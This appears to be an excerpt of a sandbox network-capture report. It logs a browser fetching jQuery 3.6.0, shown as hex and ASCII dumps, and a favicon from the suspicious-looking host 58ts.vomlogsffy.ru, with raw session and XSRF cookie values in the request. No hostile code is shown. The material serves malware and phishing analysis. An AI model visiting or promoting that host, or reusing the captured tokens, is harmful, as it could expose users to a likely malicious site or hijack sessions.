                                                                                                                                                                                                                                                    2024-12-19 21:27:57 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                                                                                    Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                                                                                    2024-12-19 21:27:57 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                                                                                                                                                                    Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                                                                                                                                                                                    2024-12-19 21:27:57 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                                                                                                                                                                    Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                                                                                                                                                                    2024-12-19 21:27:57 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                                                                                                                                                                    Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                                                                                                                                                                                    2024-12-19 21:27:57 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                                                                                                                                                                                    Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                                                                                                                                                                                    2024-12-19 21:27:57 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                                                                                                                                                                                    Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                                                                                                                                                                                    2024-12-19 21:27:57 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                                                                                                                                                                                    Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                                                                                                                                                                                    2024-12-19 21:27:57 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                                                                                                                                                                                    Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                                                                                                                                                                                    2024-12-19 21:27:57 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                                                                                                                                                                                    Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                                                                                                                                                                                    2024-12-19 21:27:57 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                                                                                                                                                                                    Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    110192.168.2.449863172.67.176.26443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:57 UTC1323OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                                    Host: 58ts.vomlogsffy.ru
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                    Referer: https://58ts.vomlogsffy.ru/z9yaFIg/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: XSRF-TOKEN=eyJpdiI6ImZlYUhxLzV0VlZpc3VtNEtFdmM1TUE9PSIsInZhbHVlIjoia1N5MkNRb3ZxNkJLL3phWUdhOUdWMGFOUGpSUkErS3JDOWszUys1eEpISTdZb0E0UGdmck9KSFNGRXY0c0xZaG5iOXZSWktuVG10d2J4elI0ajIrSmJGZ2hUdDIwbzlwQ21La05qdnhrT2xXU3lrTG4xR1ZSSXMyS1pqcDVOWUYiLCJtYWMiOiIyMzBlNGNiMDA3ZDkwMjM0ZjE4MGE0MGIzODMzMDUzZTViYWY0Nzg5NDcxOGUxM2U5MjU0OWVhZDBjOGVlNDVkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjN3UkFPRXlNdW9pd0Q3aGhHWGJ4NlE9PSIsInZhbHVlIjoiRUhIY1hjWDFJV1czVUJvQ3NNTWQ3YmRzdUFPMnpPdGRPNHhvdDNpV1NPM05uZEpncDJEcllHZmc4MkkxZkhvejloK0tvTzFSRytUOEhIdDlLUTJEYXJNK3FveDdBcmJpRVZtWlVML3BBeDRWM1gzQUFwU1NWOG5Ba1psWTZhTUIiLCJtYWMiOiIyOThlYzMzOGQ5MzI1MDkyZTIwMTA2ODFjZmEwYTM2OGNkMzlhY2Y3MDEwNzc3NThlZmFlN2FiZDYxMTIxY2ZiIiwidGFnIjoiIn0%3D
                                                                                                                                                                                                                                                    2024-12-19 21:27:58 UTC1081INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:57 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=14400
                                                                                                                                                                                                                                                    Age: 272
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JUh5Uu1BoG5vaCouqCly%2BofBAkcdcBFwc2CbvaaPYxf%2FZ37YSzvjchyrauCL98A0JzU8prtuVtk22j8vTx6Qg7B6CblmOnJ6hxrn3i0kObzkbsNhcDAE1vaikShx%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=10655&min_rtt=4799&rtt_var=8874&sent=995&recv=402&lost=0&retrans=12&sent_bytes=1234134&recv_bytes=51342&delivery_rate=3369749&cwnd=257&unsent_bytes=0&cid=bb6fb99110a70c85&ts=447163&x=0"
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8f4a7acacac642ef-EWR
                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2417&min_rtt=2408&rtt_var=910&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1901&delivery_rate=1212624&cwnd=218&unsent_bytes=0&cid=1bfbad4629fa657a&ts=4760&x=0"
                                                                                                                                                                                                                                                    2024-12-19 21:27:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    111192.168.2.449869151.101.194.137443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:59 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: code.jquery.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:59 UTC614INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Content-Length: 89501
                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                                                                                    ETag: "28feccc0-15d9d"
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                    Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:59 GMT
                                                                                                                                                                                                                                                    Age: 3165211
                                                                                                                                                                                                                                                    X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740069-EWR
                                                                                                                                                                                                                                                    X-Cache: HIT, HIT
                                                                                                                                                                                                                                                    X-Cache-Hits: 2774, 11
                                                                                                                                                                                                                                                    X-Timer: S1734643679.296047,VS0,VE0
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    2024-12-19 21:27:59 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                                                                                    Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                                                                                    2024-12-19 21:27:59 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                                                                                                                                                                                    Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                                                                                                                                                                                    2024-12-19 21:27:59 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                                                                                                                                                                                    Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                                                                                                                                                                                    2024-12-19 21:27:59 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
